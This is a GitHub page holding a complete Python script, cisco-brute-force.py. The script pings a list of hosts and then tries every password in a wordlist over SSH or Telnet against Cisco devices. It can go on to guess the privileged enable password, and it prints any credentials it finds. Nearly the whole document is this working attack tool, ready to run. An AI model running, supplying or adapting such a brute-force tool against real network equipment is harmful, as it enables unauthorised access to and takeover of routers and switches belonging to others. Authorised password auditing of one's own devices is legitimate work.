-
Notifications
You must be signed in to change notification settings - Fork 0
/
cisco-brute-force.py
158 lines (137 loc) · 5.64 KB
/
cisco-brute-force.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
#!/usr/bin/python
from __future__ import print_function
from __future__ import unicode_literals
from netmiko import ConnectHandler
import pyping
import argparse
import os
import paramiko
from netmiko import NetMikoTimeoutException, NetMikoAuthenticationException
os.system('cls' if os.name == 'nt' else 'clear')
print('''
+--------------------------------------------------------------------------+
| |
| cisco-brute-force.py |
| |
| Written by: Chris Jones ([email protected]) |
| |
+--------------------------------------------------------------------------+
''')
def processargs():
parser = argparse.ArgumentParser(description='Brute Force Logins to Cisco Devices')
parser.add_argument('-i','--input', help='Input file of hosts to brute force',required=True)
parser.add_argument('-p','--passwordlist', help='Input file of passwords to try',required=True)
parser.add_argument('-u','--username', help='Username for login attempts',required=True)
parser.add_argument('-f','--failures', help='Print Auth/Timeout Failures',required=False,action='store_true')
parser.add_argument('-e','--enable', help='Find Enable Passwords',required=False,action='store_true')
parser.add_argument('-t','--telnet', help='Use Telnet instead of SSH',required=False,action='store_true')
args = parser.parse_args()
return args.input, args.passwordlist, args.username, args.failures, args.enable, args.telnet
def grabhosts(inputfile):
try:
print(">>> Importing list of hosts from",inputfile,"... ",end="")
hostlist = open(inputfile,'r').read().split('\n')
print("SUCCESS!")
return hostlist
except:
print ("FAILED! \n\n>>> Exiting.\n")
quit()
def grabpasswords(passwordfile):
try:
print("\n>>> Importing list of passwords from",passwordfile,"... ",end="")
passwordlist = open(passwordfile,'r').read().split('\n')
print("SUCCESS!")
return passwordlist
except:
print ("FAILED! \n\n>>> Exiting.\n")
quit()
def pinghost(host):
result = pyping.ping(host.strip())
return result.ret_code # 0 = pings, 1 = no ping
def hostconnect(host,username,password,failures,device_type):
try: #attempt to SSH
net_connect = ConnectHandler(device_type=device_type, ip=host, username=username, password=password, global_delay_factor=1)
return password
except NetMikoTimeoutException as err:
if failures:
print("T",end="")
timeout = "timeout"
return timeout
except NetMikoAuthenticationException as err:
if failures:
print("A",end="")
return
except:
return
def hostenable(host,username,password,enablepassword,device_type):
try: #attempt to SSH
net_connect = ConnectHandler(device_type=device_type, ip=host, username=username, password=password, global_delay_factor=30)
net_connect.secret = enablepassword
net_connect.enable()
return enablepassword
except:
error = "error"
return error
def main():
user = os.getenv("SUDO_USER")
if user is None:
print ("\n\n!!! This program needs 'sudo' !!!\n\nExiting.\n\n")
exit()
paramiko.util.log_to_file("cisco-brute-force.log")
inputfile, passwordfile, username, failures, enable, telnet = processargs()
if telnet:
device_type = "cisco_ios_telnet"
else:
device_type = "cisco_ios_ssh"
hostlist = filter(None,grabhosts(inputfile))
passwordlist = grabpasswords(passwordfile)
pingfail = 0
if failures:
print("\nFAILURE MARKS: ON\nT = Connection Timed-Out\nA = Authentication Failed")
print("\n","="*75,"\n",end="",sep="")
for host in hostlist:
print ("\nPinging ",host,": ",end="",sep="")
if pinghost(host) == 0:
print("OK! Logging in: ",end="",sep="")
goodpassword = ""
goodenablepassword = ""
timeout = False
for password in passwordlist:
result = hostconnect(host,username,password,failures,device_type)
if result == "timeout":
timeout = True
break
elif result:
goodpassword = result
break
if goodpassword:
print("SUCCESS! Password is:",goodpassword,end="")
if enable:
for enablepassword in passwordlist:
result = hostenable(host,username,goodpassword,enablepassword,device_type)
if result == "error":
break
else:
goodenablepassword = result
break
if goodenablepassword:
print(" Enable password is:",goodenablepassword,end="")
else:
print(" Can't Enable!",end="")
elif timeout:
print("SSH TIMEOUT! Skipping...",end="")
else:
print("NO PASSWORD!",end="")
else:
print("FAILED. Skipping...",end="")
pingfail = pingfail + 1
continue
print("\n\n",pingfail,"Hosts didn't ping.")
if __name__ == '__main__':
try:
main()
print("\n\n")
except KeyboardInterrupt:
print("\n\nCTRL+C Pressed. Exiting.\n\n")
pass
exit()